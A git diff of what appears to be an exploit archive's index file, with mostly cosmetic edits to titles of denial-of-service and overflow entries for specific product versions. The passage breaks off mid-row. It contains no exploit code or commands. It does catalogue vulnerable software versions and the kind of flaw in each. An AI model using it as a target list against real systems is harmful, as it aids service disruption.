diff --git a/files.csv b/files.csv index 343eabe59..a1a982031 100644 --- a/files.csv +++ b/files.csv @@ -469,7 +469,7 @@ id,file,description,date,author,platform,type,port 3110,platforms/osx/dos/3110.rb,"Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0 3111,platforms/windows/dos/3111.pl,"Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 -3119,platforms/windows/dos/3119.py,"VideoLAN VLC Media Player 0.8.6a - Unspecified Denial of Service (1)",2007-01-12,shinnai,windows,dos,0 +3119,platforms/windows/dos/3119.py,"VideoLAN VLC Media Player 0.8.6a - Denial of Service (1)",2007-01-12,shinnai,windows,dos,0 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0 3127,platforms/windows/dos/3127.c,"KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 3128,platforms/windows/dos/3128.c,"BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)",2007-01-14,Marsu,windows,dos,0 @@ -484,7 +484,7 @@ id,file,description,date,author,platform,type,port 3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 441 - 'aim://' URL Handler Format String (PoC)",2007-01-21,MoAB,osx,dos,0 3167,platforms/osx/dos/3167.c,"Apple Mac OSX 10.4.x Kernel - 'shared_region_map_file_np()' Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,windows,dos,0 -3190,platforms/windows/dos/3190.py,"Microsoft Windows Explorer - '.AVI' Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0 +3190,platforms/windows/dos/3190.py,"Microsoft Windows Explorer - '.AVI' File Denial of Service",2007-01-24,shinnai,windows,dos,0 3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0 3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,osx,dos,0 3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",windows,dos,0 @@ -540,7 +540,7 @@ id,file,description,date,author,platform,type,port 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos,0 3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 / Gran Paradiso 3.0a3 - Hang / Crash (Denial of Service)",2007-03-29,shinnai,multiple,dos,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - Long Directory Name Denial of Service",2007-04-05,WiLdBoY,windows,dos,0 -3684,platforms/windows/dos/3684.c,"Microsoft Windows Explorer - Unspecified '.ANI' File Denial of Service",2007-04-08,Marsu,windows,dos,0 +3684,platforms/windows/dos/3684.c,"Microsoft Windows Explorer - '.ANI' File Denial of Service",2007-04-08,Marsu,windows,dos,0 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - '.hlp' Local HEAP Overflow (PoC)",2007-04-09,muts,windows,dos,0 3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 - Non-Existent applet Denial of Service",2007-04-11,shinnai,multiple,dos,0 @@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port 5307,platforms/linux/dos/5307.pl,"MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",linux,dos,0 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,windows,dos,0 5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service",2008-03-30,Marsu,windows,dos,0 -5327,platforms/windows/dos/5327.txt,"Microsoft Windows Explorer - Unspecified '.doc' File Denial of Service",2008-03-31,"Iron Team",windows,dos,0 +5327,platforms/windows/dos/5327.txt,"Microsoft Windows Explorer - '.doc' File Denial of Service",2008-03-31,"Iron Team",windows,dos,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - 'FrameworkService.exe' Remote Denial of Service",2008-04-02,muts,windows,dos,0 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0 @@ -1220,6 +1220,7 @@ id,file,description,date,author,platform,type,port 9804,platforms/windows/dos/9804.rb,"XM Easy Personal FTP Server 5.8.0 - Denial of Service (Metasploit)",2009-11-10,zhangmc,windows,dos,21 9806,platforms/windows/dos/9806.html,"HP LoadRunner 9.5 - Remote file creation (PoC)",2009-09-29,pyrokinesis,windows,dos,0 9811,platforms/windows/dos/9811.py,"Core FTP Server 1.0 build 304 - Denial of Service",2009-09-28,Dr_IDE,windows,dos,21 +9814,platforms/windows/dos/9814.py,"CDBurnerXP 4.2.4.1351 - Local Crash (Denial of Service)",2009-09-25,Dr_IDE,windows,dos,0 9823,platforms/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - Denial of Service",2009-09-24,"Jeremy Brown",solaris,dos,0 9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0 9852,platforms/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 @@ -1242,7 +1243,7 @@ id,file,description,date,author,platform,type,port 10068,platforms/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0 10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,windows,dos,21 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389 -33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 +33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Multiple Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515 10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0 10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21 @@ -1413,7 +1414,7 @@ id,file,description,date,author,platform,type,port 11590,platforms/multiple/dos/11590.php,"Mozilla Firefox 3.6 - Denial of Service (2)",2010-02-27,Ale46,multiple,dos,0 11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem - 'micro_httpd' Denial of Service (PoC)",2010-02-28,ad0nis,hardware,dos,0 11601,platforms/windows/dos/11601.pl,"Apple Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service",2010-02-28,"John Cobb",windows,dos,0 -11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FtpDisc 1.0 3 - ExploitsInOne Buffer Overflow Denial of Service",2010-03-01,"Alberto Ortega",hardware,dos,0 +11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FtpDisc 1.0 - Buffer Overflow / Denial of Service",2010-03-01,"Alberto Ortega",hardware,dos,0 11617,platforms/windows/dos/11617.txt,"Opera / Mozilla Firefox 3.6 - Long String Crash",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0 11622,platforms/windows/dos/11622.php,"Opera 10.50 - integer Overflow",2010-03-03,"Marcin Ressel",windows,dos,0 11628,platforms/windows/dos/11628.pl,"AKoff MIDI Player 1.00 - Buffer Overflow",2010-03-04,cr4wl3r,windows,dos,0 @@ -1484,7 +1485,7 @@ id,file,description,date,author,platform,type,port 12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 12154,platforms/php/dos/12154.txt,"vBulletin (Cyb - Advanced Forum Statistics) - 'misc.php' Denial of Service",2010-04-10,"Andhra Hackers",php,dos,0 -12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption (PoC)",2010-04-11,LiquidWorm,windows,dos,0 +12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Memory Corruption (PoC)",2010-04-11,LiquidWorm,windows,dos,0 12165,platforms/multiple/dos/12165.txt,"PHP 5.3.0 - 'getopt()' Denial of Service",2010-04-12,Napst3r,multiple,dos,0 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos,0 12201,platforms/windows/dos/12201.html,"MagnetoSoft DNS 4.0.0.9 - ActiveX DNSLookupHostWithServer (PoC)",2010-04-13,s4squatch,windows,dos,0 @@ -1561,7 +1562,7 @@ id,file,description,date,author,platform,type,port 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0 12698,platforms/windows/dos/12698.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Remote Denial of Service",2010-05-22,Ma3sTr0-Dz,windows,dos,0 12704,platforms/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)",2010-05-23,"sniper ip",windows,dos,0 -12740,platforms/windows/dos/12740.py,"Webby WebServer - SEH Control (PoC)",2010-05-25,m-1-k-3,windows,dos,0 +12740,platforms/windows/dos/12740.py,"Webby WebServer - Overflow (SEH) (PoC)",2010-05-25,m-1-k-3,windows,dos,0 12741,platforms/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - '.ABR' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 @@ -1571,7 +1572,7 @@ id,file,description,date,author,platform,type,port 12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0 12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote Crash (Denial of Service)",2010-06-03,PoisonCode,windows,dos,0 -12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1 - Exploit",2010-06-03,b0nd,windows,dos,0 +12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1 - Denial of Service",2010-06-03,b0nd,windows,dos,0 40087,platforms/multiple/dos/40087.txt,"Adobe Flash - ATF Processing Overflow",2016-07-11,"Google Security Research",multiple,dos,0 40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double-Free",2016-07-11,"Google Security Research",multiple,dos,0 40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0 @@ -1602,7 +1603,7 @@ id,file,description,date,author,platform,type,port 13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 -13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Exploit (SEH) (PoC)",2010-06-22,blake,windows,dos,0 +13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Overflow (SEH) (PoC)",2010-06-22,blake,windows,dos,0 14003,platforms/freebsd/dos/14003.c,"FreeBSD - 'mountnfs()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80 @@ -1698,7 +1699,7 @@ id,file,description,date,author,platform,type,port 14858,platforms/windows/dos/14858.txt,"Autodesk MapGuide Viewer - ActiveX Denial of Service",2010-09-01,d3b4g,windows,dos,0 14869,platforms/windows/dos/14869.py,"Apple QuickTime FlashPix NumberOfTiles - Remote Code Execution",2010-09-02,Abysssec,windows,dos,0 14866,platforms/novell/dos/14866.txt,"Novell Netware 6.5 - OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",novell,dos,0 -14882,platforms/windows/dos/14882.txt,"FFDshow - SEH Exception Leading to Null Pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 +14882,platforms/windows/dos/14882.txt,"FFDshow - Overflow (SEH) Exception Leading to Null Pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",windows,dos,0 14892,platforms/windows/dos/14892.py,"VideoLAN VLC Media Player < 1.1.4 - '.xspf smb://' URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow (PoC)",2010-09-05,0x6264,linux,dos,0 @@ -1734,7 +1735,7 @@ id,file,description,date,author,platform,type,port 15096,platforms/windows/dos/15096.py,"Microsoft MPEG Layer-3 Audio Decoder - Division By Zero",2010-09-24,Abysssec,windows,dos,0 15103,platforms/windows/dos/15103.py,"VMware Workstation 7.1.1 - 'VMkbd.sys' Denial of Service",2010-09-25,"Lufeng Li",windows,dos,0 15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution",2010-09-25,Abysssec,windows,dos,0 -15122,platforms/windows/dos/15122.html,"Microsoft Internet Explorer - MSHTML Findtext Processing Issue",2010-09-27,Abysssec,windows,dos,0 +15122,platforms/windows/dos/15122.html,"Microsoft Internet Explorer - MSHTML Findtext Processing Exploit",2010-09-27,Abysssec,windows,dos,0 15131,platforms/windows/dos/15131.txt,"Fox Audio Player 0.8.0 - '.m3u' Denial of Service",2010-09-27,4n0nym0us,windows,dos,0 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0 15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)",2010-09-30,Abysssec,windows,dos,0 @@ -2161,7 +2162,7 @@ id,file,description,date,author,platform,type,port 18630,platforms/android/dos/18630.txt,"Android FTPServer 1.9.0 - Remote Denial of Service",2012-03-20,G13,android,dos,0 18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 - '.tiff' Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - '.TMD' File Handling Buffer Overflow",2012-03-21,LiquidWorm,windows,dos,0 -18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 +18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT - ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,windows,dos,0 18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) 1.1.0.6 - Remote Buffer Overflow",2012-03-22,"Julien Ahrens",windows,dos,0 18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 - search func Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 @@ -2230,8 +2231,8 @@ id,file,description,date,author,platform,type,port 19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (PoC)",2012-06-11,"Florent Daigniere",hardware,dos,0 19075,platforms/linux/dos/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service",1998-04-10,Schlossnagle,linux,dos,0 -19080,platforms/linux/dos/19080.txt,"Debian suidmanager 0.18 - Exploit",1998-04-28,"Thomas Roessler",linux,dos,0 -19082,platforms/linux/dos/19082.txt,"AMD K6 Processor - Exploit",1998-06-01,Poulot-Cazajous,linux,dos,0 +19076,platforms/linux/dos/19076.txt,"Apple Personal Web Sharing 1.1 - Remote Denial of Service",1998-04-10,"Netstat Webmaster",linux,dos,0 +19082,platforms/linux/dos/19082.txt,"AMD K6 Processor - Denial of Service",1998-06-01,Poulot-Cazajous,linux,dos,0 19085,platforms/linux/dos/19085.c,"Linux Kernel 2.0/2.1 - Send a SIGIO Signal To Any Process",1998-06-30,"David Luyer",linux,dos,0 19089,platforms/windows/dos/19089.txt,"Microsoft Windows OpenType Font - File Format Denial of Service",2012-06-12,Cr4sh,windows,dos,0 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 @@ -2267,6 +2268,7 @@ id,file,description,date,author,platform,type,port 19301,platforms/linux/dos/19301.c,"Linux Kernel 2.0.33 - IP Fragment Overlap",1998-04-17,"Michal Zalewski",linux,dos,0 19308,platforms/linux/dos/19308.c,"Linux Kernel 2.0/2.0.33 - i_count Overflow (PoC)",1998-01-14,"Aleph One",linux,dos,0 19410,platforms/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow Denial of Service",1999-02-22,Prizm,windows,dos,0 +19326,platforms/solaris/dos/19326.txt,"Sun Solaris 7.0 - 'procfs' Denial of Service",1999-03-09,"Toomas Soome",solaris,dos,0 19328,platforms/windows/dos/19328.txt,"Qutecom SoftPhone 2.2.1 - Heap Overflow Crash (Denial of Service) PoC)",2012-06-22,"Debasish Mandal",windows,dos,0 19331,platforms/windows/dos/19331.txt,"ACDSee PRO 5.1 - '.RLE' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19332,platforms/windows/dos/19332.txt,"ACDSee PRO 5.1 - '.PCT' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 @@ -2299,7 +2301,7 @@ id,file,description,date,author,platform,type,port 19453,platforms/windows/dos/19453.cpp,"PC Tools Firewall Plus 7.0.0.123 - Local Denial of Service",2012-06-29,0in,windows,dos,0 19456,platforms/windows/dos/19456.txt,"PowerNet Twin Client 8.9 - 'RFSync 1.0.0.1' Crash (PoC)",2012-06-29,"Luigi Auriemma",windows,dos,0 19457,platforms/multiple/dos/19457.txt,"Microsoft Commercial Internet System 2.0/2.5 / IIS 4.0 / Site Server Commerce Edition 3.0 alpha/3.0 - Denial of Service",1999-08-11,"Nobuo Miwa",multiple,dos,0 -19463,platforms/linux/dos/19463.c,"S.u.S.E. Linux 6.2 / Slackware Linux 3.2/3.6 - identd Denial of Service",1999-08-16,friedolin,linux,dos,0 +19463,platforms/linux/dos/19463.c,"S.u.S.E. Linux 6.2 / Slackware Linux 3.2/3.6 - 'identd' Denial of Service",1999-08-16,friedolin,linux,dos,0 19471,platforms/windows/dos/19471.html,"Microsoft Internet Explorer 5 - HTML Form Control Denial of Service",1999-08-27,"Neon Bunny",windows,dos,0 19477,platforms/hardware/dos/19477.txt,"TFS Gateway 4.0 - Denial of Service",1999-08-31,anonymous,hardware,dos,0 19482,platforms/multiple/dos/19482.txt,"GIMP 2.8.0 - '.FIT' File Format Denial of Service",2012-06-30,"Joseph Sheridan",multiple,dos,0 @@ -2410,7 +2412,7 @@ id,file,description,date,author,platform,type,port 20017,platforms/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 - Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos,0 20020,platforms/windows/dos/20020.txt,"Alt-N MDaemon 2.8.5 - UIDL Denial of Service",2000-06-16,Craig,windows,dos,0 20023,platforms/linux/dos/20023.c,"Gnome 1.0/1.1 / Group X 11.0 / XFree86 X11R6 3.3.x/4.0 - Denial of Service",2000-06-19,"Chris Evans",linux,dos,0 -20025,platforms/linux/dos/20025.txt,"Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - rpc.lockd Remote Denial of Service",2000-06-08,"Mike Murray",linux,dos,0 +20025,platforms/linux/dos/20025.txt,"Debian 2.1/2.2 / Mandrake 6.0/6.1/7.0 / RedHat 6.x - 'rpc.lockd' Remote Denial of Service",2000-06-08,"Mike Murray",linux,dos,0 20026,platforms/linux/dos/20026.c,"OpenLinux 2.3/2.4 / RedHat 6.0/6.1 / SCO eServer 2.3 - Denial of Service",1999-11-23,FuckGpm,linux,dos,0 20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 - Denial of Service",2000-06-25,"MDMA Crew",windows,dos,0 20047,platforms/windows/dos/20047.txt,"Microsoft Windows Server 2000 - Telnet Server Denial of Service",2000-06-30,"SecureXpert Labs",windows,dos,0 @@ -2430,11 +2432,12 @@ id,file,description,date,author,platform,type,port 20100,platforms/windows/dos/20100.pl,"WFTPD 2.4.1RC11 - STAT/LIST Command Denial of Service",2000-07-21,"Blue Panda",windows,dos,0 20101,platforms/windows/dos/20101.pl,"WFTPD 2.4.1RC11 - 'REST' Malformed File Write Denial of Service",2000-07-21,"Blue Panda",windows,dos,0 20102,platforms/windows/dos/20102.pl,"WFTPD 2.4.1RC11 - Unauthenticated MLST Command Remote Denial of Service",2000-07-21,"Blue Panda",windows,dos,0 +43147,platforms/hardware/dos/43147.sh,"D-Link DIR605L - Denial of Service",2017-11-14,"Enrique Castillo",hardware,dos,0 20167,platforms/linux/dos/20167.txt,"eGlibc - Signedness Code Execution",2012-08-01,c0ntex,linux,dos,0 20175,platforms/windows/dos/20175.pl,"PragmaSys TelnetServer 2000 - rexec Buffer Overflow",2000-08-24,"Ussr Labs",windows,dos,0 20178,platforms/multiple/dos/20178.pl,"vqSoft vqServer 1.4.49 - Denial of Service",2000-08-19,sinfony,multiple,dos,0 20192,platforms/unix/dos/20192.txt,"LPPlus 3.2.2/3.3 - Permissions Denial of Service",2000-09-06,"Dixie Flatline",unix,dos,0 -20217,platforms/linux/dos/20217.c,"RedHat Linux 6.1 i386 - Tmpwatch Recursive Write Denial of Service",2000-09-09,"zenith parsec",linux,dos,0 +20217,platforms/linux/dos/20217.txt,"RedHat Linux 6.1 i386 - Tmpwatch Recursive Write Denial of Service",2000-09-09,"zenith parsec",linux,dos,0 20219,platforms/windows/dos/20219.txt,"WebTV for Windows 98/ME - Denial of Service",2000-09-12,Smashstack,windows,dos,0 20221,platforms/windows/dos/20221.pl,"Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow",2000-09-11,"Guido Bakker",windows,dos,0 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - Denial of Service",1999-12-01,"Ussr Labs",windows,dos,0 @@ -2485,7 +2488,7 @@ id,file,description,date,author,platform,type,port 20531,platforms/multiple/dos/20531.txt,"IBM HTTP Server 1.3 - AfpaCache/WebSphereNet.Data Denial of Service",2001-01-08,"Peter Grundl",multiple,dos,0 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos,0 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",multiple,dos,0 -20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0 +20535,platforms/linux/dos/20535.txt,"ReiserFS 3.5.28 (Linux Kernel) - Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0 20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - 'SIZE' Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0 20705,platforms/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",windows,dos,0 @@ -2784,7 +2787,7 @@ id,file,description,date,author,platform,type,port 22240,platforms/windows/dos/22240.txt,"Opera 6.0/7.0 - opera.PluginContext Native Method Denial of Service",2003-01-13,"Marc Schoenefeld",windows,dos,0 22243,platforms/linux/dos/22243.txt,"RARLAB FAR 1.65/1.70 - File Manager Buffer Overflow",2003-02-11,3APA3A,linux,dos,0 22245,platforms/windows/dos/22245.txt,"Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow",2003-02-11,3APA3A,windows,dos,0 -22249,platforms/aix/dos/22249.txt,"IBM AIX 4.3.3/5.1/5.2 libIM - Buffer Overflow",2003-02-12,"Euan Briggs",aix,dos,0 +22249,platforms/aix/dos/22249.txt,"IBM AIX 4.3.3/5.1/5.2 - 'libIM' Buffer Overflow",2003-02-12,"Euan Briggs",aix,dos,0 22250,platforms/multiple/dos/22250.sh,"iParty Conferencing Server - Denial of Service",1999-05-08,wh00t,multiple,dos,0 22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4.0 - 'Riched20.dll' Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0 22258,platforms/windows/dos/22258.txt,"Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 - Multiple Vulnerabilities",2012-10-26,shinnai,windows,dos,0 @@ -2931,7 +2934,7 @@ id,file,description,date,author,platform,type,port 22947,platforms/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 - Administrative Interface Long Request Denial of Service",2003-07-21,"David F.Madrid",hardware,dos,0 22949,platforms/netware/dos/22949.txt,"Novell Netware Enterprise Web Server 5.1/6.0 - CGI2Perl.NLM Buffer Overflow",2003-07-23,"Uffe Nielsen",netware,dos,0 22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service",2003-07-23,"David F. Madrid",hardware,dos,0 -22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 - Unspecified Memory Disclosure",2003-07-23,V9,linux,dos,0 +22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 - Memory Disclosure",2003-07-23,V9,linux,dos,0 22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service (MS03-031)",2003-07-23,refdom,windows,dos,0 22962,platforms/hardware/dos/22962.pl,"Cisco Aironet AP1x00 - GET Denial of Service",2003-07-28,blackangels,hardware,dos,0 22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow",2003-07-16,kf,unix,dos,0 @@ -2951,7 +2954,6 @@ id,file,description,date,author,platform,type,port 22999,platforms/windows/dos/22999.pl,"Meteor FTP Server 1.2/1.5 - USER Memory Corruption",2003-08-08,zerash,windows,dos,0 40405,platforms/multiple/dos/40405.txt,"Symantec RAR Decomposer Engine (Multiple Products) - Out-of-Bounds Read / Out-of-Bounds Write",2016-09-21,"Google Security Research",multiple,dos,0 23042,platforms/windows/dos/23042.pl,"Cerberus FTPServer 1.71/2.1/2.32 - Remote Denial of Service",2003-08-20,"real Remoter",windows,dos,0 -23045,platforms/linux/dos/23045.pl,"ViRobot Linux Server 2.0 - Exploit",2003-08-20,kf,linux,dos,0 23048,platforms/linux/dos/23048.txt,"Srcpd 2.0 - Remote Integer Overflow",2003-08-21,Over_G,linux,dos,0 23050,platforms/multiple/dos/23050.txt,"Avant Browser 8.0.2 - 'HTTP Request' Buffer 